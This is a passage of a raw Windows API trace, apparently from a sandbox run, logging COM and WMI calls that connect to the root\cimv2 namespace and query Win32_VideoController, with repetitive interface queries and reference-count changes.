0x80004002 [0133.965] IUnknown:Release (This=0x75849c) returned 0x1 [0133.965] CoGetClassObject (in: rclsid=0x4bf975c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x744bd1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189d28 | out: ppv=0x189d28*=0x593d6b8) returned 0x0 [0133.966] WbemLocator:IUnknown:QueryInterface (in: This=0x593d6b8, riid=0x744f0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189f40 | out: ppvObject=0x189f40*=0x0) returned 0x80004002 [0133.966] WbemLocator:IClassFactory:CreateInstance (in: This=0x593d6b8, pUnkOuter=0x0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f54 | out: ppvObject=0x189f54*=0x593d2d0) returned 0x0 [0133.966] WbemLocator:IUnknown:Release (This=0x593d6b8) returned 0x0 [0133.966] WbemLocator:IUnknown:QueryInterface (in: This=0x593d2d0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b74 | out: ppvObject=0x189b74*=0x593d2d0) returned 0x0 [0133.966] WbemLocator:IUnknown:QueryInterface (in: This=0x593d2d0, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b30 | out: ppvObject=0x189b30*=0x0) returned 0x80004002 [0133.966] WbemLocator:IUnknown:AddRef (This=0x593d2d0) returned 0x3 [0133.966] WbemLocator:IUnknown:QueryInterface (in: This=0x593d2d0, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18948c | out: ppvObject=0x18948c*=0x0) returned 0x80004002 [0133.966] WbemLocator:IUnknown:QueryInterface (in: This=0x593d2d0, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18943c | out: ppvObject=0x18943c*=0x0) returned 0x80004002 [0133.966] WbemLocator:IUnknown:QueryInterface (in: This=0x593d2d0, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189448 | out: ppvObject=0x189448*=0x0) returned 0x80004002 [0133.966] CoGetContextToken (in: pToken=0x1894a8 | out: pToken=0x1894a8) returned 0x0 [0133.966] CoGetContextToken (in: pToken=0x1898b0 | out: pToken=0x1898b0) returned 0x0 [0133.966] WbemLocator:IUnknown:QueryInterface (in: This=0x593d2d0, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189940 | out: ppvObject=0x189940*=0x0) returned 0x80004002 [0133.966] WbemLocator:IUnknown:Release (This=0x593d2d0) returned 0x2 [0133.966] WbemLocator:IUnknown:Release (This=0x593d2d0) returned 0x1 [0133.966] CoGetContextToken (in: pToken=0x189f20 | out: pToken=0x189f20) returned 0x0 [0133.966] CoGetContextToken (in: pToken=0x189e80 | out: pToken=0x189e80) returned 0x0 [0133.966] WbemLocator:IUnknown:QueryInterface (in: This=0x593d2d0, riid=0x189f50*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189f4c | out: ppvObject=0x189f4c*=0x593d2d0) returned 0x0 [0133.966] WbemLocator:IUnknown:AddRef (This=0x593d2d0) returned 0x3 [0133.966] WbemLocator:IUnknown:Release (This=0x593d2d0) returned 0x2 [0133.966] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a0e8 | out: puCount=0x18a0e8*=0x2) returned 0x0 [0133.966] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=8, puBuffLength=0x18a0e4*=0x0, pszText=0x0 | out: puBuffLength=0x18a0e4*=0xf, pszText=0x0) returned 0x0 [0133.966] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=8, puBuffLength=0x18a0e4*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a0e4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0133.966] CoCreateInstance (in: rclsid=0x74f61284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74f612e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x189fc0 | out: ppv=0x189fc0*=0x593d268) returned 0x0 [0133.967] WbemLocator:IWbemLocator:ConnectServer (in: This=0x593d268, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x18a054 | out: ppNamespace=0x18a054*=0x593e35c) returned 0x0 [0133.977] WbemLocator:IUnknown:QueryInterface (in: This=0x593e35c, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ef0 | out: ppvObject=0x189ef0*=0x4b30434) returned 0x0 [0133.977] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x4b30434, pProxy=0x593e35c, pAuthnSvc=0x189f40, pAuthzSvc=0x189f3c, pServerPrincName=0x189f34, pAuthnLevel=0x189f38, pImpLevel=0x189f28, pAuthInfo=0x189f2c, pCapabilites=0x189f30 | out: pAuthnSvc=0x189f40*=0xa, pAuthzSvc=0x189f3c*=0x0, pServerPrincName=0x189f34, pAuthnLevel=0x189f38*=0x6, pImpLevel=0x189f28*=0x2, pAuthInfo=0x189f2c, pCapabilites=0x189f30*=0x1) returned 0x0 [0133.977] WbemLocator:IUnknown:Release (This=0x4b30434) returned 0x1 [0133.977] WbemLocator:IUnknown:QueryInterface (in: This=0x593e35c, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ee4 | out: ppvObject=0x189ee4*=0x4b30454) returned 0x0 [0133.977] WbemLocator:IUnknown:QueryInterface (in: This=0x593e35c, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ee0 | out: ppvObject=0x189ee0*=0x4b30434) returned 0x0 [0133.977] WbemLocator:IClientSecurity:SetBlanket (This=0x4b30434, pProxy=0x593e35c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0133.977] WbemLocator:IUnknown:Release (This=0x4b30434) returned 0x2 [0133.977] WbemLocator:IUnknown:Release (This=0x4b30454) returned 0x1 [0133.977] CoTaskMemFree (pv=0x4bf9930) [0133.977] WbemLocator:IUnknown:Release (This=0x593d268) returned 0x0 [0133.978] WbemLocator:IUnknown:QueryInterface (in: This=0x593e35c, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ae0 | out: ppvObject=0x189ae0*=0x4b30454) returned 0x0 [0133.978] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30454, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189a9c | out: ppvObject=0x189a9c*=0x0) returned 0x80004002 [0133.978] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30454, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1898bc | out: ppvObject=0x1898bc*=0x0) returned 0x80004002 [0133.978] WbemLocator:IUnknown:AddRef (This=0x4b30454) returned 0x3 [0133.978] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30454, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1893fc | out: ppvObject=0x1893fc*=0x0) returned 0x80004002 [0133.979] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30454, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1893ac | out: ppvObject=0x1893ac*=0x0) returned 0x80004002 [0133.979] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30454, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1893b8 | out: ppvObject=0x1893b8*=0x4b303b4) returned 0x0 [0133.979] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b303b4, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1893c0 | out: pCid=0x1893c0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.979] WbemLocator:IUnknown:Release (This=0x4b303b4) returned 0x3 [0133.979] CoGetContextToken (in: pToken=0x189418 | out: pToken=0x189418) returned 0x0 [0133.979] CoGetContextToken (in: pToken=0x189820 | out: pToken=0x189820) returned 0x0 [0133.979] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30454, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898b0 | out: ppvObject=0x1898b0*=0x4b3043c) returned 0x0 [0133.979] WbemLocator:IRpcOptions:Query (in: This=0x4b3043c, pPrx=0x4b30454, dwProperty=2, pdwValue=0x1898d8 | out: pdwValue=0x1898d8) returned 0x80004002 [0133.979] WbemLocator:IUnknown:Release (This=0x4b3043c) returned 0x3 [0133.979] WbemLocator:IUnknown:Release (This=0x4b30454) returned 0x2 [0133.979] CoGetContextToken (in: pToken=0x189df0 | out: pToken=0x189df0) returned 0x0 [0133.979] CoGetContextToken (in: pToken=0x189d50 | out: pToken=0x189d50) returned 0x0 [0133.979] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30454, riid=0x189e20*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x189e1c | out: ppvObject=0x189e1c*=0x593e35c) returned 0x0 [0133.979] WbemLocator:IUnknown:AddRef (This=0x593e35c) returned 0x4 [0133.979] WbemLocator:IUnknown:Release (This=0x593e35c) returned 0x3 [0133.979] WbemLocator:IUnknown:Release (This=0x593e35c) returned 0x2 [0133.979] SysStringLen (param_1=0x0) returned 0x0 [0133.980] CoGetContextToken (in: pToken=0x189de8 | out: pToken=0x189de8) returned 0x0 [0133.980] WbemLocator:IUnknown:AddRef (This=0x4b30454) returned 0x3 [0133.980] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30454, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189c7c | out: ppvObject=0x189c7c*=0x4b30454) returned 0x0 [0133.980] WbemLocator:IUnknown:Release (This=0x4b30454) returned 0x3 [0133.980] WbemLocator:IUnknown:Release (This=0x4b30454) returned 0x2 [0133.980] CoGetContextToken (in: pToken=0x189ed8 | out: pToken=0x189ed8) returned 0x0 [0133.980] WbemLocator:IUnknown:AddRef (This=0x593e35c) returned 0x3 [0133.980] IWbemServices:ExecQuery (in: This=0x593e35c, strQueryLanguage="WQL", strQuery="select * from Win32_VideoController", lFlags=16, pCtx=0x0, ppEnum=0x18a0f0 | out: ppEnum=0x18a0f0*=0x593db4c) returned 0x0 [0133.985] IUnknown:QueryInterface (in: This=0x593db4c, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f48 | out: ppvObject=0x189f48*=0x593db50) returned 0x0 [0133.985] IClientSecurity:QueryBlanket (in: This=0x593db50, pProxy=0x593db4c, pAuthnSvc=0x189f98, pAuthzSvc=0x189f94, pServerPrincName=0x189f8c, pAuthnLevel=0x189f90, pImpLevel=0x189f80, pAuthInfo=0x189f84, pCapabilites=0x189f88 | out: pAuthnSvc=0x189f98*=0xa, pAuthzSvc=0x189f94*=0x0, pServerPrincName=0x189f8c, pAuthnLevel=0x189f90*=0x6, pImpLevel=0x189f80*=0x2, pAuthInfo=0x189f84, pCapabilites=0x189f88*=0x1) returned 0x0 [0133.985] IUnknown:Release (This=0x593db50) returned 0x1 [0133.985] IUnknown:QueryInterface (in: This=0x593db4c, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f3c | out: ppvObject=0x189f3c*=0x4b30364) returned 0x0 [0133.985] IUnknown:QueryInterface (in: This=0x593db4c, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f38 | out: ppvObject=0x189f38*=0x593db50) returned 0x0 [0133.985] IClientSecurity:SetBlanket (This=0x593db50, pProxy=0x593db4c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0133.986] IUnknown:Release (This=0x593db50) returned 0x2 [0133.986] WbemLocator:IUnknown:Release (This=0x4b30364) returned 0x1 [0133.986] CoTaskMemFree (pv=0x4bf9990) [0133.986] IUnknown:QueryInterface (in: This=0x593db4c, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b34 | out: ppvObject=0x189b34*=0x4b30364) returned 0x0 [0133.986] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189af0 | out: ppvObject=0x189af0*=0x0) returned 0x80004002 [0133.987] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18990c | out: ppvObject=0x18990c*=0x0) returned 0x80004002 [0133.987] WbemLocator:IUnknown:AddRef (This=0x4b30364) returned 0x3 [0133.987] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18944c | out: ppvObject=0x18944c*=0x0) returned 0x80004002 [0133.987] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1893fc | out: ppvObject=0x1893fc*=0x0) returned 0x80004002 [0133.988] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189408 | out: ppvObject=0x189408*=0x4b302c4) returned 0x0 [0133.988] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b302c4, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189410 | out: pCid=0x189410*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.988] WbemLocator:IUnknown:Release (This=0x4b302c4) returned 0x3 [0133.988] CoGetContextToken (in: pToken=0x189468 | out: pToken=0x189468) returned 0x0 [0133.988] CoGetContextToken (in: pToken=0x189870 | out: pToken=0x189870) returned 0x0 [0133.988] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189900 | out: ppvObject=0x189900*=0x4b3034c) returned 0x0 [0133.988] WbemLocator:IRpcOptions:Query (in: This=0x4b3034c, pPrx=0x4b30364, dwProperty=2, pdwValue=0x189928 | out: pdwValue=0x189928) returned 0x80004002 [0133.988] WbemLocator:IUnknown:Release (This=0x4b3034c) returned 0x3 [0133.988] WbemLocator:IUnknown:Release (This=0x4b30364) returned 0x2 [0133.988] CoGetContextToken (in: pToken=0x189e48 | out: pToken=0x189e48) returned 0x0 [0133.988] CoGetContextToken (in: pToken=0x189da8 | out: pToken=0x189da8) returned 0x0 [0133.988] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x189e78*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189e74 | out: ppvObject=0x189e74*=0x593db4c) returned 0x0 [0133.988] IUnknown:AddRef (This=0x593db4c) returned 0x4 [0133.988] IUnknown:Release (This=0x593db4c) returned 0x3 [0133.988] IUnknown:Release (This=0x593db4c) returned 0x2 [0133.988] WbemLocator:IUnknown:Release (This=0x593e35c) returned 0x2 [0133.988] SysStringLen (param_1=0x0) returned 0x0 [0133.988] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a13c | out: puCount=0x18a13c*=0x2) returned 0x0 [0133.988] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a138*=0x0, pszText=0x0 | out: puBuffLength=0x18a138*=0xf, pszText=0x0) returned 0x0 [0133.988] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a138*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a138*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0133.988] CoGetContextToken (in: pToken=0x189f90 | out: pToken=0x189f90) returned 0x0 [0133.988] IUnknown:AddRef (This=0x593db4c) returned 0x3 [0133.988] IEnumWbemClassObject:Clone (in: This=0x593db4c, ppEnum=0x18a14c | out: ppEnum=0x18a14c*=0x593e3fc) returned 0x0 [0133.989] IUnknown:QueryInterface (in: This=0x593e3fc, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a010 | out: ppvObject=0x18a010*=0x593e400) returned 0x0 [0133.989] IClientSecurity:QueryBlanket (in: This=0x593e400, pProxy=0x593e3fc, pAuthnSvc=0x18a060, pAuthzSvc=0x18a05c, pServerPrincName=0x18a054, pAuthnLevel=0x18a058, pImpLevel=0x18a048, pAuthInfo=0x18a04c, pCapabilites=0x18a050 | out: pAuthnSvc=0x18a060*=0xa, pAuthzSvc=0x18a05c*=0x0, pServerPrincName=0x18a054, pAuthnLevel=0x18a058*=0x6, pImpLevel=0x18a048*=0x2, pAuthInfo=0x18a04c, pCapabilites=0x18a050*=0x1) returned 0x0 [0133.989] IUnknown:Release (This=0x593e400) returned 0x1 [0133.989] IUnknown:QueryInterface (in: This=0x593e3fc, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a004 | out: ppvObject=0x18a004*=0x4b30634) returned 0x0 [0133.990] IUnknown:QueryInterface (in: This=0x593e3fc, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a000 | out: ppvObject=0x18a000*=0x593e400) returned 0x0 [0133.990] IClientSecurity:SetBlanket (This=0x593e400, pProxy=0x593e3fc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0133.991] IUnknown:Release (This=0x593e400) returned 0x2 [0133.991] WbemLocator:IUnknown:Release (This=0x4b30634) returned 0x1 [0133.991] CoTaskMemFree (pv=0x4bf9930) [0133.991] IUnknown:QueryInterface (in: This=0x593e3fc, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189bec | out: ppvObject=0x189bec*=0x4b30634) returned 0x0 [0133.991] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189ba8 | out: ppvObject=0x189ba8*=0x0) returned 0x80004002 [0133.991] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1899c4 | out: ppvObject=0x1899c4*=0x0) returned 0x80004002 [0133.992] WbemLocator:IUnknown:AddRef (This=0x4b30634) returned 0x3 [0133.992] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189504 | out: ppvObject=0x189504*=0x0) returned 0x80004002 [0133.992] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1894b4 | out: ppvObject=0x1894b4*=0x0) returned 0x80004002 [0133.992] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1894c0 | out: ppvObject=0x1894c0*=0x4b30594) returned 0x0 [0133.992] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b30594, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1894c8 | out: pCid=0x1894c8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.992] WbemLocator:IUnknown:Release (This=0x4b30594) returned 0x3 [0133.992] CoGetContextToken (in: pToken=0x189520 | out: pToken=0x189520) returned 0x0 [0133.993] CoGetContextToken (in: pToken=0x189928 | out: pToken=0x189928) returned 0x0 [0133.993] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1899b8 | out: ppvObject=0x1899b8*=0x4b3061c) returned 0x0 [0133.993] WbemLocator:IRpcOptions:Query (in: This=0x4b3061c, pPrx=0x4b30634, dwProperty=2, pdwValue=0x1899e0 | out: pdwValue=0x1899e0) returned 0x80004002 [0133.993] WbemLocator:IUnknown:Release (This=0x4b3061c) returned 0x3 [0133.993] WbemLocator:IUnknown:Release (This=0x4b30634) returned 0x2 [0133.993] CoGetContextToken (in: pToken=0x189f00 | out: pToken=0x189f00) returned 0x0 [0133.993] CoGetContextToken (in: pToken=0x189e60 | out: pToken=0x189e60) returned 0x0 [0133.993] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x189f30*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189f2c | out: ppvObject=0x189f2c*=0x593e3fc) returned 0x0 [0133.993] IUnknown:AddRef (This=0x593e3fc) returned 0x4 [0133.993] IUnknown:Release (This=0x593e3fc) returned 0x3 [0133.993] IUnknown:Release (This=0x593e3fc) returned 0x2 [0133.993] IUnknown:Release (This=0x593db4c) returned 0x2 [0133.993] SysStringLen (param_1=0x0) returned 0x0 [0133.993] IEnumWbemClassObject:Reset (This=0x593e3fc) returned 0x0 [0133.994] CoTaskMemAlloc (cb=0x4) returned 0x4b29760 [0133.994] IEnumWbemClassObject:Next 